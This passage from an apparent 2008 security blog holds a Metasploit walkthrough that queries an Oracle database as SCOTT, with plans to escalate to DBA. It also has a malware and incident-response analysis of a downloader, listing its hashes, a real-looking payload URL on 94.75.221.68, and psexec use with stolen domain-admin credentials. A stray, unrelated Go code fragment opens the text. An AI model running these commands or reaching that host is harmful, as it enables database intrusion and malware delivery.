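	tree := parseDescriptors(sampleReply)
	fmt.Println("SECURITY:", findAll(tree, "SECURITY")[0].Value, "services:", ServiceNames(sampleReply))
}
```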



Let's try it with the service name: UNLUCKYXDB.MYPWN

msf auxiliary(oracle_sql) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
[*] PL/SQL Release 9.2.0.1.0 - Production
[*] CORE 9.2.0.1.0 Production
[*] TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
[*] NLSRTL Version 9.2.0.1.0 - Production
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >


**Yeah, it worked. Now it's time to get some more useful info:

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed


That's it for part 1. In part 2 we'll use some SQLi to hopefully bump Scott up to DBA and execute some OS commands.

Friday, November 14, 2008

Link: Writing malicious macros using metasploit

Good blog post over at securiteam on using the exe2vba portion of metasploit to embed malicious code into office documents. Fun!

http://blogs.securiteam.com/index.php/archives/1161

Of course, those attacks can be mitigated with proper group policy, but most places "need their macros!", so enjoy the pwnings.

Sunday, October 19, 2008

From Virus Alert to Pwnage Part 2

Some analysis on 2.exe.

2.exe : Not detected by Sandbox (Signature: NO_VIRUS)


[ DetectionInfo ]
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS
* Compressed: YES
* TLS hooks: NO
* Executable type: Application
* Executable file structure: OK
* Filetype: PE_I386

[ General information ]
* Decompressing UPX3.
* File length: 2560 bytes.
* MD5 hash: c6e1de2f6ecae93c09c6bae78d8edcbf.

[ Changes to registry ]
* Creates key "HKCU\Software\Microsoft\Sound".



AhnLab-V3 2008.10.15.0 2008.10.14 -
AntiVir 7.8.1.34 2008.10.14 -
Authentium 5.1.0.4 2008.10.14 -
Avast 4.8.1248.0 2008.10.15 -
AVG 8.0.0.161 2008.10.15 -
BitDefender 7.2 2008.10.15 Trojan.Zlob.1.Gen
CAT-QuickHeal 9.50 2008.10.14 -
ClamAV 0.93.1 2008.10.15 -
DrWeb 4.44.0.09170 2008.10.15 -
eSafe 7.0.17.0 2008.10.12 Suspicious File
eTrust-Vet 31.6.6148 2008.10.14 -
Ewido 4.0 2008.10.14 -
F-Prot 4.4.4.56 2008.10.14 -
F-Secure 8.0.14332.0 2008.10.15 Trojan-Downloader.Win32.Zlob.ajl
Fortinet 3.113.0.0 2008.10.14 -
GData 19 2008.10.15 Trojan.Zlob.1.Gen
Ikarus T3.1.1.34.0 2008.10.15 -
K7AntiVirus 7.10.493 2008.10.14 -
Kaspersky 7.0.0.125 2008.10.15 Trojan-Downloader.Win32.Zlob.ajl
McAfee 5405 2008.10.14 -
Microsoft 1.4005 2008.10.15 -
NOD32 3522 2008.10.14 -
Norman 5.80.02 2008.10.14 -
Panda 9.0.0.4 2008.10.14 Suspicious file
PCTools 4.4.2.0 2008.10.14 -
Prevx1 V2 2008.10.15 Malicious Software
Rising 20.66.12.00 2008.10.14 -
SecureWeb-Gateway 6.7.6 2008.10.15 -
Sophos 4.34.0 2008.10.15 Sus/Behav-1005
Sunbelt 3.1.1722.1 2008.10.14 -
Symantec 10 2008.10.15 Downloader
TheHacker 6.3.1.0.112 2008.10.15 -
TrendMicro 8.700.0.1004 2008.10.14 PAK_Generic.001
VBA32 3.12.8.6 2008.10.14 -
ViRobot 2008.10.14.1419 2008.10.14 -
VirusBuster 4.5.11.0 2008.10.14 -
Additional information
File size: 2560 bytes
MD5...: c6e1de2f6ecae93c09c6bae78d8edcbf
SHA1..: 1b1d7916206583a57e54fe82ebe05a8fb55b25d5
SHA256: 68350cc81af2e867eecea64f1cc83e34ff8c19ad22b8c077529380cdadeaa658
SHA512: 512fd40e91bd47c1e6f1a0e202457cc5fe31ed90a2555f9af8a54796663b3c7a308729d606a409ef8484edf9bf4b4a1310db8cba61b941b380f6d2ee09e3c694
PEiD..: -
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x4041c0
timedatestamp.....: 0x48eeb35b (Fri Oct 10 01:43:55 2008)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x3000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x4000 0x1000 0x400 6.22 ad30fe5c04339024e6b3344e72484898
UPX2 0x5000 0x1000 0x200 2.06 ebb1b5a9cd4ce06c69ef5ac4d3d7b72b

( 2 imports )
KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc,
VirtualFree, ExitProcess
ADVAPI32.dll: RegCloseKey

( 0 exports )
Prevx info:
http://info.prevx.com/aboutprogramtext.asp?PX5=54E3AAE0008B14250A3900BD90B69A00B79BCD14
packers (Kaspersky): PE_Patch.UPX, UPX
packers (F-Prot): UPX


Filename c:\2.exe
Filesize 2560 bytes
MD5 c6e1de2f6ecae93c09c6bae78d8edcbf
DLL-Handling
Loaded DLLs
C:\WINDOWS\system32\ntdll.dll
C:\WINDOWS\system32\kernel32.dll
C:\WINDOWS\system32\ADVAPI32.dll
C:\WINDOWS\system32\RPCRT4.dll
C:\WINDOWS\system32\Secur32.dll
C:\WINDOWS\system32\user32.dll
C:\WINDOWS\system32\GDI32.dll
C:\WINDOWS\system32\oleaut32.dll
C:\WINDOWS\system32\msvcrt.dll
C:\WINDOWS\system32\ole32.dll
C:\WINDOWS\system32\IMM32.DLL
C:\WINDOWS\system32\pstorec.dll
C:\WINDOWS\system32\ATL.DLL
Registry
Process Management Creates Process - Filename () CommandLine:
(C:\Program Files\Internet Explorer\iexplore.exe http://94.75.221.68/stuff/border8.gif) As User: () Creation Flags: ()

--------

Found a norton report based on the IP

https://safeweb.norton.com/report/show?url=94.75.221.68&x=0&y=0

Severity: High

3 instances found. Here is a sample:

Downloader
Location: http://94.75.221.68/stuff/border10.gif
Downloader
Location: http://94.75.221.68/stuff/border8.gif
Downloader
Location: http://94.75.221.68/stuff/border9.gif

----------
**show tcpstream from running the 2.exe in a VM

GET /stuff/border9.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 94.75.221.68
Connection: Keep-Alive

HTTP/1.1 404 Not Found
Server: nginx/0.5.20
Date: Wed, 15 Oct 2008 20:27:23 GMT
Content-Type: text/html
Content-Length: 529
Connection: close


html
head title 404 Not Found /title /head
body bgcolor="white"
center h1 404 Not Found /h1 /center
hr center nginx/0.5.20 /center
/body
/html
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --

**I removed the brackets because blogspot kept rendering the html :-(

Saturday, October 18, 2008

From Virus Alert to Pwnage Part 1

The first week of your new job is normally for finding your desk, getting email set up, and finding the best place to grab coffee and snacks. Well, not for me!

What started Tuesday morning as a simple virus outbreak on one of the networks we monitor turned, after some initial IR, into full domain pwnage :-(

The initial virus alert looked something like this:

Alert: Virus Found
Computer:
Date:
Time: 1:34:59 AM
Severity: Critical
Source: Symantec AntiVirus Corporate Edition
File Path:C:\WINDOWS\system32\2.exe
User:
Virus Name:Downloader

A quick question for anyone reading: what kind of privileges are required to write to the system32 folder? The answer should be your first clue to the scope of the problem.

We jumped in on one of the boxes that came up with the virus alert to see what we could find.

A quick review of the task manager listed 6 or 7 iexplore.exe processes running as a user that wasn't logged into the host. A quick net user "thatuser" /domain let us know that the user was a member of the domain admins group...oops. We did do a quick call to confirm that the real user hadn't logged into that box.

The iexplore.exe process was connected to an IP that resolved to Amsterdam, pulling down "banner8.gif" and "banner9.gif". Thus far we haven't located any copies of banner8.gif and banner9.gif on the network, and the IP isn't serving them up right now (404). We've asked for FW logs to see if any hosts actually got a 200 for the file(s).

I'll post what (mostly dean) came up with for analysis of 2.exe in a separate post.

Lastly, they had a Cisco CSA agent running (in test mode) on one of the hosts that was infected. The logs of the agent had an alert of psexec executing 2.exe with the domain admin user's creds...oops. The good news (for the CSA deployment) was that it would have been blocked had CSA been in enforcement mode. Bad news was that it wasn't.

We also had the domain profile of the unfortunate user show up on all the infected boxes. I'm guessing it's a result of the psexec command, but if anyone has any insight on that I'd appreciate a comment.

Any comments on the situation? At this point, what would you do?

More to follow...

Monday, February 11, 2008

Reliable Local Root since 2006?